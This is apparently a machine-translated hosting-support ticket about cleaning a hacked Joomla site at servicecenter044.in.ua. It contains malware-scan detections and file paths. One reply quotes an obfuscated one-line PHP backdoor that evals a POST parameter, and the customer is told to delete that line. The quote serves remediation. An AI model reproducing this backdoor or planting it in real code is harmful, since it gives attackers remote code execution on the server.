| Question: |
Good morning. Restore, please backup the website servicecenter044.in.ua. Hacked. Thank you |
| Answer: |
Hello the website servicecenter044.in.ua works. what zaklyuchetsya hacking? |
| Question: |
Google sent that was the introduction via a URL. And as a recommendation proposed to restore the site from the last good backup. |
| Answer: |
we need more specific data. there`s nothing here https://sitecheck.sucuri.net/results/servicecenter044.in.ua now we will check the website antivirus. potamu that 1 is not the fact that he`s hacked 2 became the same data that You have on the website |
| Question: |
In Google webmaster there were errors scan and there are links to pages that I have exactly net:http://servicecenter044.in.ua/otpi3sa/ipl-fiver2016g.htmlhttp://servicecenter044.in.ua/cwod7h/sairat-tiket-in-cenepolis.HTML is written that the site was compromised and created pages posted content that contains spam. |
| Answer: |
the report skanirovaniya http://servicecenter044.in.ua/AI-BOLIT-REPORT-__-359356-22-05-2016_10-37.html now check backup |
| Answer: |
will notify when google sent You a report. |
| Question: |
Report sent last night, and errors are indicated for 19 and 20 may |
| Answer: |
our backup was done yesterday, may 21 |
| Answer: |
a suspicious script you have may 12 |
| Answer: |
in the logs of the antivirus even older dates /home/esma/servicecenter044/defender.php: {HEX}php.mailer.Mzh.509.UNOFFICIAL FOUND
/home/esma/servicecenter044/defender.php: {HEX}php.mailer.Mzh.509.UNOFFICIAL FOUND
/home/esma/servicecenter044/includes/defender.php: {HEX}php.mailer.Mzh.510.UNOFFICIAL FOUND
/home/esma/servicecenter044/includes/defender.php: {HEX}php.mailer.Mzh.510.UNOFFICIAL FOUND
/home/esma/servicecenter044/libraries/cms/toolbar/button/help.php: {HEX}php.mailer.Mzh.510.UNOFFICIAL FOUND
/home/esma/servicecenter044/style.php: {HEX}gzbase64.inject.unclassed.15.UNOFFICIAL FOUND |
| Question: |
Earlier versions do not? |
| Question: |
Than may 21? |
| Answer: |
no. the site was infected for at least 12 may we are now udalili part of malicious files. I`ll re-skanirovanie |
| Answer: |
http://servicecenter044.in.ua/AI-BOLIT-REPORT-__-705544-22-05-2016_10-56.html |
| Question: |
Thank you very much. Do You think it will help to get rid of this \"content\"? |
| Answer: |
the file specified in the report, delete the first line with harmful code for example <?php $swn81=\"sotp_\";$djyq11= strtoupper ($swn81[4].$swn81[3] . $swn81[1].$swn81[0]. $swn81[2]); if(isset ( ${$djyq11}[ `q421aac`] ) ){ eval (${$djyq11 } [`q421aac`] ) ;} <?php only <?php at the end of the line place, it`s important |
| Question: |
And if the file has only one line, and
|
| Answer: |
then this virus |
| Question: |
And if the file has only one row, then delete everything except
|
| Answer: |
first Try to rename the file. |
| Question: |
Doesn`t work neither the site nor the admin panel |
| Answer: |
what you removed? |
| Answer: |
why you removed the configuration file? |
| Question: |
line in /home/esma/servicecenter044/components/com_contact/layouts/joomla/page.php that is specified in the report, before that saved her and already got it back |
| Question: |
works! |
| Answer: |
you have deleted a file of konfiguratsii. no need to udlat without seeing exactly what you are removing. |
| Question: |
okay, I`ll watch, just specify it in the report |
| Answer: |
http://servicecenter044.in.ua/AI-BOLIT-REPORT-__-278190-22-05-2016_11-29.html from the report. the files do not delete. remove only the code |
| Question: |
I file and are not removed ,I removed the line in the file page.php or code it something else? I probably something do not understand |
| Answer: |
no. you removed the file configuration.php/ you did |
| Question: |
I didn`t touch it. I only got into the file page.php and that`s all. as a disappeared file configuration.php I have no idea. |
| Answer: |
be careful when working. we vosstanovili files. and scanned the. use the last report |
| Question: |
OK, thanks, I`ll try to understand |
| Answer: |
ok
|
